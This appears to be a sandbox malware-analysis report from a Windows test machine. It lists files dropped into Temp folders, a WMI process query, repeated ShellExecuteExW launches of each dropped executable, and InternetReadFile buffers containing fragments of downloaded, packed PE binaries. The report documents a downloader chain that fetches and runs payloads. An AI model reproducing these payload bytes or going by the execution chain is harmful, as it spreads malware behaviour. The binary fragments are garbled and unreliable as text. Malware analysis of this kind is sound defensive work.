file C:\Users\test22\AppData\Local\Temp\34.bat
file C:\Users\test22\AppData\Local\Temp\d610cf342e\ramez.exe
file C:\Users\test22\AppData\Local\Temp\Work\NSudoLG.exe
file C:\Users\test22\AppData\Local\Temp\10017910101\FuaxeNA.exe
file C:\Users\test22\AppData\Local\Temp\10018450101\OE1vOqz.exe
file C:\Users\test22\AppData\Local\Temp\10019230101\dDthTIC.exe
file C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe
file C:\Users\test22\AppData\Local\Temp\10020490101\207216b66f.exe
file C:\Users\test22\AppData\Local\Temp\10020500101\39d8455be9.exe
file C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe
file C:\Users\test22\AppData\Local\Temp\10020530101\lYvr05n.exe
file C:\Users\test22\AppData\Local\Temp\10020540101\bPtJj46.exe
file C:\Users\test22\AppData\Local\Temp\10020550101\amnew.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\68140be001524.vbs
file C:\Users\test22\AppData\Local\Temp\10020550101\amnew.exe
file C:\Users\test22\AppData\Local\Temp\Work\cecho.exe
file C:\Users\test22\AppData\Local\Temp\is-6FDHC.tmp\a3e8f181a3.tmp
file C:\Users\test22\AppData\Local\Temp\d610cf342e\ramez.exe
file C:\Users\test22\AppData\Local\Temp\Work\7z.exe
file C:\Users\test22\AppData\Local\Temp\10020490101\207216b66f.exe
file C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe
file C:\Users\test22\AppData\Local\Temp\10019230101\dDthTIC.exe
file C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe
file C:\Users\test22\AppData\Local\Temp\10017910101\FuaxeNA.exe
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\d610cf342e\ramez.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\d610cf342e\ramez.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10015950101\lYvr05n.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10015950101\lYvr05n.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10017910101\FuaxeNA.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10017910101\FuaxeNA.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10018450101\OE1vOqz.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10018450101\OE1vOqz.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10019230101\dDthTIC.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10019230101\dDthTIC.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10020490101\207216b66f.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10020490101\207216b66f.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10020500101\39d8455be9.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10020500101\39d8455be9.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10020520101\dDthTIC.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10020520101\dDthTIC.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10020530101\lYvr05n.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10020530101\lYvr05n.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10020540101\bPtJj46.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10020540101\bPtJj46.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10020550101\amnew.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10020550101\amnew.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† |%hð" èx˜@paz`pž(`ð(&pœ @X¡À.textšçè `.rdataŒÂÄð@@.data8,д@À.pdataÄ@@.OLM à `.gxfgp0æ@@.retplneŒPü_RDATAô`þ@@.relocœp@B.bssh€h@À.bsshð hp @À.rsrcð`Ø@@AWAVAUATVWUSHƒìx‰ÖH‰ÏH‹äÁH1àH‰D$p3qèH‰D$(H‹GH‰ÁHÁé‰L$0ƒàA¹Ȫ&1ÒA¼mÊ¥ˆAº•L3A»ñ«l½,RÆd¹n{™A¾€]æ]Aùû¶I Géŋ΍{ÿ¯û@öÇA¹¿é' ¿/™ßrDDσ=óÍ DLÏf.„Aùû¶I ŽƒAù˜®LŽ&Aù+RÆdŽAùð«lwAù,RÆd„ÀAùÕ"hi„êAùÁžßiu©‹ƒÍ{ÿ¯û@öÇA¹Ÿ‰ÌDDɃ=lÍ DLÉAùû¶I ˆf.„AùߴяAù0Ñ«ŽAùÚvÌ»RAù1Ñ«„«AùA­®„¶AùoϤµ…"ÿÿÿHc\$dH‹|$(i<Ÿ•éÑ[‰ûÁë1ûiەéÑ[i|$`•éÑ[1߉|$L‹\$dƒÃ‰\$P‹Å̍{ÿ¯û@öÇA¹É¦…n¿¯çÞÓé±þÿÿf.„AùȪ&ޱAù”L3öAùȪ&„=Aùgù3'„WAù”³þ1…þÿÿH‹\$@HƒûA¹×2<å¿ÛvÌ»DDÏE1íAùû¶I dþÿÿéâþÿÿfAù“d†èŽAùõr㠏ÍAù”d†è„AùR»ý„1Aù›“…þÿÿH‹\$8¾3\$liەéÑ[3\$`‰\$\‹Ïˍ{ÿ¯û@öÇA¹"Øt¼¿7qÞé»ýÿÿAùCL>\ŽËAùDL>\„ÿAù€]æ]„ Aù™äc…¡ýÿÿH‹\$8¾[Áã3\$h‰\$X‹gˍ{ÿ¯û@öÇA¹»¬>ˆEDʃ=PË ELÊAùû¶I hýÿÿéæýÿÿAùlÊ¥ˆކAùmÊ¥ˆ„ÏAùn{™„ßAùÈèOª…"ýÿÿ‹üʍ{ÿ¯û@öÇA¹É¦…n¿oϤµéèüÿÿAù¢Ž}Aù ¢„¸Aù7qÞ„¦üÿÿAùŸ‰Ì…ÎüÿÿA¹ÁžßiAùû¶I ÈüÿÿéFýÿÿAùL‡ÞŽpAùM‡Þ„ŒAù×2<å„°AùðBç…‚üÿÿH‹\$@HƒûA¹ ¢»‡‘ì DLËE1ÀAùû¶I güÿÿéåüÿÿAùñ«l„†Aùɦ…n„–Aù/™ßr….üÿÿ‹Ê{ÿ¯û@öÇA¹ü¶I ED΃=ñÉ ELÎAùû¶I  üÿÿé‡üÿÿAùÛvÌ»„ºAù"Øt¼„ÒAùè ÒÀ…Ðûÿÿ‹ªÉ{ÿ¯û@öÇA¹M‡Þ¿!¥>é–ûÿÿAù•L3„ñAù!¥>„AùÆûJ…‰ûÿÿ‹cɍ{ÿ¯û@öÇA¹1Ñ«¿örã éOûÿÿAùörã „ÿAùãÃ[ „ Aù¿é' …BûÿÿH‹\$8‹\$l‹\$l‹\$l‹\$l‹\$l‹\$l‹\$l‹\$l‹\$l‹\$`A¹gù3'Aùû¶I ûÿÿéûÿÿAù™®L„9Aù2«W…ãúÿÿ‹\$0‹\$dA¹R»ýAùû¶I ÕúÿÿéSûÿÿAù3.Ž‚„—Aù»¬>ˆ…©úÿÿH‹\$8‹\$h‹\$h‹\$h‹\$h‹\$hA¹™äcAùû¶I ŠúÿÿéûÿÿAùü¶I „|Aù‡‘ì …^úÿÿD‰D$h‹3ȍ{ÿ¯û@öÇA¹Ÿ‰Ì¿ÁžßiéúÿÿAùà´Ñ„UAù¯çÞÓ…úÿÿ‹t$L‹T$PA¹Ȫ&Aùû¶I úÿÿéúÿÿ‹ÙǍ{ÿ¯û@öÇA¹DL>\ED˃=ÂÇ ELËAùû¶I ÚùÿÿéXúÿÿ‹¢Ç{ÿ¯û@öÇA¹DL>\DD̓=‹Ç DLÍAùû¶I £ùÿÿé!úÿÿA¹ÆûJAùû¶I ‹ùÿÿé úÿÿH‹\$8A¹3.Ž‚Aùû¶I nùÿÿéìùÿÿ‰t$`‰T$d‹=.Ǎ_ÿ¯ßöÃA¹2«W¿R»ýéùÿÿ‹Ç{ÿ¯û@öÇA¹"Øt¼¿›“éûøÿÿH‹\$@HƒûA¹ðB翔³þ1DLÏAùû¶I ýøÿÿé{ùÿÿ‹\$0‹|$d9ßœD$7‹¶Æ{ÿ¯û@öÇA¹2«W¿ãÃ[ 颸ÿÿA¹,RÆdAùû¶I
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL ^hà  >"n\ `@  `… \K`|€ Ù[  H.textt< > `.rsrc|` @@@.reloc €`@BP\H G(ògÈ9«0 þ8þ EP#}¤˜88Ž 8Ëÿÿÿ8Š 8¼ÿÿÿþ  òÿÿÿ>g ~U{y:šÿÿÿ& 8ÿÿÿþ  >Åÿÿÿ ~U{_9mÿÿÿ& 8bÿÿÿþ ( þ þ8Cÿÿÿrps z*( é  s ( þ 8ÿÿÿ(*&~þ*~*0G(8( ~U{9& 8 8Ìÿÿÿþ E8*&~þ*~*0G(8( ~U{89& 8 8Ìÿÿÿþ E8*&~þ*~*0 þ8þ E•/¾Xl8*s € ~U{9»ÿÿÿ& 8°ÿÿÿs € ~U{J:’ÿÿÿ& 8‡ÿÿÿs € 8sÿÿÿs € ~U{:Uÿÿÿ& 8Jÿÿÿs € ~U{9,ÿÿÿ& 8!ÿÿÿ( ~U{L9ÿÿÿ& 8ýþÿÿ0 ~o *0 ~o *0 ~o *0 ~o *0 ~o *&~ þ*~ *0[ þ8þ E 8{ *{ (+}  ~U{p:Âÿÿÿ& 8·ÿÿÿ0ã þ8þ E:ef88ƒ 8Óÿÿÿ*:K ~U{B9¸ÿÿÿ& 8­ÿÿÿ{ @Ïÿÿÿ ~U{:ÿÿÿ& 8‚ÿÿÿ* Q†) c àâa~U{Ta(­s z| o+ ~U{6::ÿÿÿ& 8/ÿÿÿ0) Œ9þo 9~ 9K~ Ð(! o" 9< ×ÜÐe c ¨äua~U{a(­(# s$ zs% € ~ Ð(! o& (+ ݋u"%:&8% (( o) þþþþ& iF¥Ñ »øša~U{Ia(­ o) o* ¢ (# o) s+ z~ Ð(! o, Ü8**‘ ÆEœ‘z 0 þo- þ*0G(8(. ~U{9:& 8 8Ìÿÿÿþ E8*0 (/ (0 *0(1 *0 Ð(! *0 (2 *&~ þ*~ *0 (/ (0 *0(1 *0 Ð(! *0 (2 *0 Œ:(+**0 þ*0G(8(. ~U{}:& 8 8Ìÿÿÿþ E8*&~ þ*~ *0~3 Œ: (+€3 ~3 *0G(8(. ~U{X:& 8 8Ìÿÿÿþ E8*&~4 þ*~4 *0p(8(5 ~U{ :& 8 8Ìÿÿÿþ E*8%o- ~U{c9Ôÿÿÿ& 8Éÿÿÿ*0@ þ8þ E8*:e ~U{I:& 8þ E){WB8$8q ~U{4:Éÿÿÿ& 8¾ÿÿÿ{: þ8¡ÿÿÿ{o6 8ÿÿÿ8 ~U{9wÿÿÿ& 8lÿÿÿÝ<ÿÿÿ(7 ~U{p:& 8þ E8Ü ~U{t9Ýþÿÿ& 8Òþÿÿ&Âè90ï% þ8þ E׿ MC!° HM¥Ãõ©F.ÜJ á‚D) s‚A¨Wym$~‘Š™ Žù ¥e‚)ú? `›ÑŽ!Î ãålY Ï ¦J• ²Ýª6*– 6 Þ H­ (R Ú®êôµv~ £ û 7ÑzàáIâô>Ô^æ š _ Ó眷EÈKªWþ é¹!Ž<"+º7) - ¢!êàÓÔù~ZN < î zú 4 Š Âwƒjio # ÿ n ¶.ðû[­•_€«eà“0² ¼ ‡ : þ{¤õÌ ÒڸȮ˜o‹
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† ýihð" ê8™@Pž` ž(@ð4h (&pœ0 @ˆ¡À.textZèê `.rdata4ÃÄò@@.datah,ж@À.pdata4Æ@@.OLM‹  â `.gxfgp0ì@@.retplneŒP_RDATAô`@@.relocœp@B.bss\€\@À.bss\à \j @À.rsrcð@Æ@@AWAVAUATVWUSHìˆH‹æÁH1àH‰„$€‹e΋-c΍Xÿ¯ØöÔD$2ƒý œD$3‰T$,H‰Ï¸Äp3A½sŽ;r½ÊCo=G{è/ëy‹#΍Hÿ¯ÈöÁ¸@˹ÖMo»DÁƒ= Î LÁ=G{è~L=Ãp3ޱ=P¼ñIŽj=þ\ž=Q¼ñI„]=)%1O„=½ÖjOu»¸wá=G{è¶f=ÎçH½ŽÅ=Š–ÙŽ_=rQޏŸ=Š–Ù„õ=¨«˜Ù„š=|áÄÚ…kÿÿÿH‹D$HD¾pAÁæE1þ¸ÚÓi=G{èQÿÿÿë›f.„= à H=V„ôŽy=W„ô„^=‘p\„q=wá…ÿÿÿ‹ÍHÿ¯ÈöÁ¸…µÂ«¹ÿ\éÛþÿÿf.„=©0םN=„&’ŽD=„&’„;='Z œ„Y=½Ôœ…¦þÿÿ‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p¸LÊ´;=G{菅ýÿÿéÌýÿÿ=È9B<ŽV=É9B<„5=¿Á`F„ì=ZëéI…Mýÿÿ¸Ç/ =G{èDýÿÿé‹ýÿÿ=@ËŽu=@Ë„Ó=p²Í„Ý=æb‘Ó… ýÿÿ€|$G¸… ¹sQÞEÁ=G{èöüÿÿé=ýÿÿ=„ Ž^=… „¸=bãL„Ë=Ç/ …¾üÿÿ‹D$pÁè 3D$piÀ•éÑ[‰ÁÁé1Á‰L$d‹ŸÊHÿ¯ÈöÁ¸W„ô¹wåèéwüÿÿ=„µÂ«ŽÍ=…µÂ«„™=YÎg²„7=ÖMo»…Xüÿÿ‹UʍHÿ¯ÈöÁ¸*G”á¹wáé-üÿÿ=ÿ\„!=”g„È=ځÓi…üÿÿH‹D$H¾D1ðDià•éÑ[D3d$h¸ÏçH½=G{èùûÿÿé@üÿÿ=sQÞ„ =Վß„±ûÿÿ=*G”á…Ìûÿÿ‹ÉɍHÿ¯ÈöÁ¸)%1O¹Š–Ùé¡ûÿÿ=wåè„ =H{è…˜ûÿÿ¸D ¦=G{菏ûÿÿéÖûÿÿ=ŸM݋„T=±ŸÚ…mûÿÿHcD$lH‹L$8i•éÑ[‰ÁÁé1ÁiÁ•éÑ[iL$h•éÑ[1Á‰L$\‹D$lƒÀ‰D$`‹3ɍHÿ¯ÈöÁ¸ŸM݋¹ÑQuÄé ûÿÿ=Äp3„+=LÊ´;…ûÿÿ‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹D$p‹ÓȍHÿ¯ÈöÁ¸½Ôœ¹ZëéIé«úÿÿ=ÏçH½„ö=ÑQuÄ…¢úÿÿ‹D$\‰D$(¸'Z œ‹t$`=G{菍úÿÿéÔúÿÿ=à „â=Ðs…kúÿÿ‹D$@‹D$@‹D$@‹D$@H‹D$8‹[ȍHÿ¯ÈöÁ”D$v‹ KȸŸžLéADŃù œD$wALÅH‹Oºã罐úÉCo~úÊCot/úsŽ;ruè遁úãç½t(úŸžLéuкÊCoúÉCoËëáH‰L$x‰ÂúÉCoºëж\$v€|$wºŸžLéEՄÛEՁúÉCo™ë¯=ª0ם„<=D ¦…–ùÿÿH‹D$PHƒø¸bãL¹„&’LÁ=G{è|ùÿÿéÃùÿÿ‹D$@‹L$l9ÁœD$G‹^ǍHÿ¯ÈöÁ¸¿Á`F¹æb‘Óé6ùÿÿ‹HǍHÿ¯ÈöÁ”D$v‹ 8ǸŸžLéADŃù œD$wALÅH‹Oºãç½f.„@úÉCo~úÊCot/úsŽ;ruè鞁úãç½t(úŸžLéuкÊCoúÉCoËëáH‰L$x‰ÂúÉCoºëж\$v€|$wºŸžLéEՄÛEՁúÉCo™ë
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELr:hà Ô’0K@`Kÿ3@€WàkÐðøá ÀÆ@à.rsrcðÐÖ@À.idata àØ@À +ðÚ@àbdozedic0ð00Ü@ànrtpbldi K @à.taggant00K"@à
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $x_cí<> ¾<> ¾<> ¾ˆ¢ü¾1> ¾ˆ¢þ¾²> ¾ˆ¢ÿ¾$> ¾Ið¾>> ¾I ¿/> ¾I¿+> ¾I¿> ¾5F޾7> ¾5Fž¾;> ¾<> ¾)? ¾ÉI¿ > ¾ÉI ¿=> ¾ÉIò¾=> ¾ÉI¿=> ¾Rich<> ¾PEL ¿ bà .”@0@@@@Á°64D°64ÀH°6 ±T ¾@à°0HÂ@àPà @à0@àP@@à0$@à.rsrc À$@àÐ/àB@à.data °6‚ B@à2t‘W©ò{ÿɝHcÓ( þ_Íÿ÷=Ú¾jŠ´ïØ“P´jØ%äI90¡Vœch†æJ牚cC5$ㅲµRZÚ^0 ¹ f5tÂ_Ž`^@ð½ûÐdš¨«_•¸3vç.àH¬“LsA¥=,t•P/[Hü—#hØ-„v³F9è_¾Îêu›iTT,ˆÖ (ŽTÄþ"Z«¯q^ӓ…£yÔ(]st[a½zÈkRöìKšS¨•µ™CçÌb]DTc†¶xeهµÒM±zTÎÔ∠Qì5¢ÍPq bÕQ¡…`XáÌN‰Îv¶Œ¥–Quɺ^>Tz°[bԚªÆˆçW§'* Î|ÃΪ$À´ƒøÄƒ.LoCÚïoÓÅè²Öµnwu\Òn¡tlf‡¯Ä1Øú‚²Ö% fÊ%ÊR‰­óùô“&-„KVÑæ¦6›ê°‡9çOã¥æ¶ˆXµ™YåÇ»¡û§ûögûª´Õÿ¤êš‡¢Å®¤kÖ4¹x묪ŒÈaÃ\_ž_—¾áÂÛaª©&Rªôíù.^d×}ß\]‹É3¹l}%¨¨N †êBî<-¶nü#é5»FÀ®Ö—X{އ6¯sP?·>ٍ²ùN°ËB‰‚±ÒÓ¿¸'dö˜ƒ-Á¦Î\‘_*zÔº\g˘Ôë¥2_%q]5˜Íâ-0UŽ™€ç„õj(K´ .DD‘([ÌäpñœŠ# U@{£l©îîw6°]9©ÞY5ÿi5£›éV«£Ôá¹~_™9 äõdA´—ZÏóȝŸqÔOæ`ST£œKÜÕi¤Ó;PZ÷š†òTÄi‡C qG•M³ß­œî\Çb0•¼´ÈžAÕFy{ùÑòµ bèlõãÁñLqÌȳƒ|Ú›Qu·ñº‹©O7ÿDb›ïbû¿ßÖD˜ÑGèèe˜ÇÒ²{GÅ[éæžuO,Qƒ¿jä*W;Ζ#m_܇؝Åɤ€¬t‹f²Š|Ä`ë?دÓ'®ÝÔû¾Œè•Èùѧ×%<ñ"ݞßj‚ Vc¿á?!iG? Îä2 i…9 öak¬Å´TyŸKû æ÷ùÐ · ošÊ +~-\âHÉ֒ò ˜ÏgÆÔ5öCL©é–×ж®bˁÈ}j[”! -f˜u 5í ùÅJ­˜|¸Åö7Mº–=õ’S|¼CN¤BA”á °|Jü(Z909Öº{“±û•ÁF…m˜EËi+–Ä1ñhTJo@´¾rù‹F– sk¤ú×U¡µ»> yG”8O•kg^ø^“'Ò„6g0 ½ï~P¬‡G7(Ñ:ïӑdãœéTöÕåÅvõOqtEh‰]@¤4¯6Òu†<™Á ¬TåpºùdŠ÷.Á.ãÈ\9yE=J•¦%ƒ9ħ§ü¡SŽ|e{¼P¸æ:¤|zã Zs¯d;£Rarô[Ð\Lä¡Þã“@¾Õr–ëëo"ÖÖ«YLܤxufbV%mo7ÂÃ1Á£2çr«¹G´ }ǐƒæ…ÍÒSºÕa¾mÀ|’3y9©~SåpЌSè…"B9| 8¢…>:¸J/nøÿ¦G‹'-.9ý2cŸåÞ´^½=¦Ä%R‘è5¼œ]x¥ 2öŠPJ=ÿ•n¹».:à•]Ǜ5yó O¸•RMï4ø0'‡ã›ñÀ,r$@Q‘ÎÒ}ü—ºDZzƒïq*6NJ§Ú„âØÀ`òó7õrÀËE2@hÅp¼‘5cÁ?áaŽYl6&¦w{ßõ(&ÆÐ“¼<(7ƒ%»ëÕ«›ùÿæ\˜£‹ç!ò$‰Ö*ÙÀo}:Öä>!àÛQôÿá  Ö© áo“ÛHÐHGï,’éõŽ Ÿ+ ¬šÝ“=‰ØÞeêÃág"$[˜eՋ´ƒ‚É7‚à ºJ¯ §Hîƒ9öŸia(±ï°Ä%wzI•¡Üœ¸H—R„Z3ÓÇO7÷ßÇ&^È?ÂaêÔ$`ېo òÊ͔HA3·€w;¡ÍČ ’ÙƒCƒ™´P27­^#ƒµmìÞ`,‰fÍUN½Jc,ÏÚCHb àæöÙ\¥ÛAró3óÀü@^KÖxX¯óèïóòûTðXð-ûA)Ùâ•N“¶ë­¯o8•€N«_B(u‰TßBʓ ÒpñÈtBÞϚ­ãL´Ócy¨¤·)Úuõ…‹œ;€ Á(øf.¤¬^a¿:‡/ºþ…`X?|ùÖÐè³ùûêIJ@£5OçÁwõa¢wa‚èuÌØ<Â=la,eñ3î‡k®·hí‰uuÿ1µjz¿Fý¸:#rÅ.…]`øƒ@0Êãý0Y|кÅG«‚xh»º ¥é´Ð Íû÷FÚ·»°Ì=S Q„D*%“‡úL^Ó| ªß—¢EÆÚË*¥|ÖOþ=“Ÿd^AÀ w©ÑАÞè~O$O2›ÇÓf`“=é”[i’Ê Õ¿ø4*xǃ¡úþ~£vÄäg€õõý|49è¯(Lùü«Tz€å²'ØÖÕg]8 X‚ÛØ(K#ß¹Ñ8:21#š,q¿Ðþ¾ Ø?Þ"²E?ý.I¡›ôY?dE¯\R‘WۙP¤¥…«¢ ÷le›4Kf@苫M ,rªž·Ea@ãç¬RÇK÷‚5,!/1eØ ¤‚+Åh§¥ÿÏ ÄêW¶8KÒ`Ã÷Õ1à-WýhróŽbºIxkùüBl æÅ”`Ô–îJ~‚ ‘½w #å¼VKÞÐtÚ}ûDží‚ï~.Ù¸HÛ*òåABs¿X¡Géh,9ìM ,}i ¡arÿ«È ò^e› 2C–6¥ÆäYާB7ӖÜm9+ë^»U¤î–0y?óywaVy:ðF¤kº"Oî‰Íy5>¥°ö{瘝 $ŸÕ­*Ÿ@•2§QbüIŸŸ ŽùøoäᚁNV1>à¡u›H<1vý(ù' ÷~nIXÇWQ\°«¨—}>œ‚\°–³šáüMÑÅH‡%QÅņ`Túpï'ÃDîx¢ÁF(ÕmO¥2W/i8F€ùû¨¾& tÅ뼏}š«ßJXU¤d£#ur¢¯¢ŒË ªédºÜÉGì’Q¿s¹ìaUigÚsIW‹×óZ±m¬Á£. & ‡Xãxà”^)ùç? CȎ¯U?üwý¤KTÀOð+^µH… }øÕÁßcá/K%ÎõbHïÚÓ×GuÑ-¹m…ÎYKTÕìÅՄN&%ŒÅì£n˜Ñ0Äñ!é šK ©æäés,@ªÆ±I€:eõa‡HDÂ8ÉZtEÄÃĸQkK(ćÄ:%âÞ`²kÞ¿;VñåÖ®p9¸ _M²òçÝøµ[á' Ú5 ö>&K¶¹^Âzݛ›PS+~Om°m\­7’½ ²‘všE?¹F&R÷§dŠ{àò¿hgŸó,®«Fj—¯ ÷ڒ¢îÝXPÀìÄêsâù7:VMÛÚ´ºi ÎB]Ñœ ª¶©‡„f®Ì.V>ϖR•óȪÒ#¹ º̾*À’e¤º›µ@ïÕwæÎÌǙUýÆgè»Yõ ñÎcœW4;úò¨ÒúAj—÷aÆÇÕB®ÕVÿåµJS4ÕšR”#'ŠñT•<ãŽù¥ð¡È—q£?Ýë•ü{C¶ñ˨9UÔ?–Ì@n O*”A†‘‚¿G–” _qãV8buˆ]~$eZQ©é¾¹1ë2 ¬÷hþùL3îù(NõXŽÞHÀ\:ùa]'æ4Íó²xç䊈^>ž+™¥êö­SZÎ ²²|‹×o1‚ôˆ˜gº‰\µ:5Vj½ˆÀOÁ úl—_¢ìö >e¹¤ÓG³A€
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ Rn1p}p@ }2C@`07t`ðÉ0¸[}h[} P¼@à.rsrcðÉ0`¼%Ì@À.idata 07ˆ(@À À+@7Š(@àftynlkci`c`Œ(@àbkbmgnxk`}ìB@à.taggant0p}"ðB@à
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† |%hð" èx˜@p„©`pž(`ðn (&pœ @X¡À.textšçè `.rdataŒÂÄð@@.data8,д@À.pdataÄ@@.OLM à `.gxfgp0æ@@.retplneŒPü_RDATAô`þ@@.relocœp@B.bssh€h@À.bsshð hp @À.rsrcð`Ø@@AWAVAUATVWUSHƒìx‰ÖH‰ÏH‹äÁH1àH‰D$p3qèH‰D$(H‹GH‰ÁHÁé‰L$0ƒàA¹Ȫ&1ÒA¼mÊ¥ˆAº•L3A»ñ«l½,RÆd¹n{™A¾€]æ]Aùû¶I Géŋ΍{ÿ¯û@öÇA¹¿é' ¿/™ßrDDσ=óÍ DLÏf.„Aùû¶I ŽƒAù˜®LŽ&Aù+RÆdŽAùð«lwAù,RÆd„ÀAùÕ"hi„êAùÁžßiu©‹ƒÍ{ÿ¯û@öÇA¹Ÿ‰ÌDDɃ=lÍ DLÉAùû¶I ˆf.„AùߴяAù0Ñ«ŽAùÚvÌ»RAù1Ñ«„«AùA­®„¶AùoϤµ…"ÿÿÿHc\$dH‹|$(i<Ÿ•éÑ[‰ûÁë1ûiەéÑ[i|$`•éÑ[1߉|$L‹\$dƒÃ‰\$P‹Å̍{ÿ¯û@öÇA¹É¦…n¿¯çÞÓé±þÿÿf.„AùȪ&ޱAù”L3öAùȪ&„=Aùgù3'„WAù”³þ1…þÿÿH‹\$@HƒûA¹×2<å¿ÛvÌ»DDÏE1íAùû¶I dþÿÿéâþÿÿfAù“d†èŽAùõr㠏ÍAù”d†è„AùR»ý„1Aù›“…þÿÿH‹\$8¾3\$liەéÑ[3\$`‰\$\‹Ïˍ{ÿ¯û@öÇA¹"Øt¼¿7qÞé»ýÿÿAùCL>\ŽËAùDL>\„ÿAù€]æ]„ Aù™äc…¡ýÿÿH‹\$8¾[Áã3\$h‰\$X‹gˍ{ÿ¯û@öÇA¹»¬>ˆEDʃ=PË ELÊAùû¶I hýÿÿéæýÿÿAùlÊ¥ˆކAùmÊ¥ˆ„ÏAùn{™„ßAùÈèOª…"ýÿÿ‹üʍ{ÿ¯û@öÇA¹É¦…n¿oϤµéèüÿÿAù¢Ž}Aù ¢„¸Aù7qÞ„¦üÿÿAùŸ‰Ì…ÎüÿÿA¹ÁžßiAùû¶I ÈüÿÿéFýÿÿAùL‡ÞŽpAùM‡Þ„ŒAù×2<å„°AùðBç…‚üÿÿH‹\$@HƒûA¹ ¢»‡‘ì DLËE1ÀAùû¶I güÿÿéåüÿÿAùñ«l„†Aùɦ…n„–Aù/™ßr….üÿÿ‹Ê{ÿ¯û@öÇA¹ü¶I ED΃=ñÉ ELÎAùû¶I  üÿÿé‡üÿÿAùÛvÌ»„ºAù"Øt¼„ÒAùè ÒÀ…Ðûÿÿ‹ªÉ{ÿ¯û@öÇA¹M‡Þ¿!¥>é–ûÿÿAù•L3„ñAù!¥>„AùÆûJ…‰ûÿÿ‹cɍ{ÿ¯û@öÇA¹1Ñ«¿örã éOûÿÿAùörã „ÿAùãÃ[ „ Aù¿é' …BûÿÿH‹\$8‹\$l‹\$l‹\$l‹\$l‹\$l‹\$l‹\$l‹\$l‹\$l‹\$`A¹gù3'Aùû¶I ûÿÿéûÿÿAù™®L„9Aù2«W…ãúÿÿ‹\$0‹\$dA¹R»ýAùû¶I ÕúÿÿéSûÿÿAù3.Ž‚„—Aù»¬>ˆ…©úÿÿH‹\$8‹\$h‹\$h‹\$h‹\$h‹\$hA¹™äcAùû¶I ŠúÿÿéûÿÿAùü¶I „|Aù‡‘ì …^úÿÿD‰D$h‹3ȍ{ÿ¯û@öÇA¹Ÿ‰Ì¿ÁžßiéúÿÿAùà´Ñ„UAù¯çÞÓ…úÿÿ‹t$L‹T$PA¹Ȫ&Aùû¶I úÿÿéúÿÿ‹ÙǍ{ÿ¯û@öÇA¹DL>\ED˃=ÂÇ ELËAùû¶I 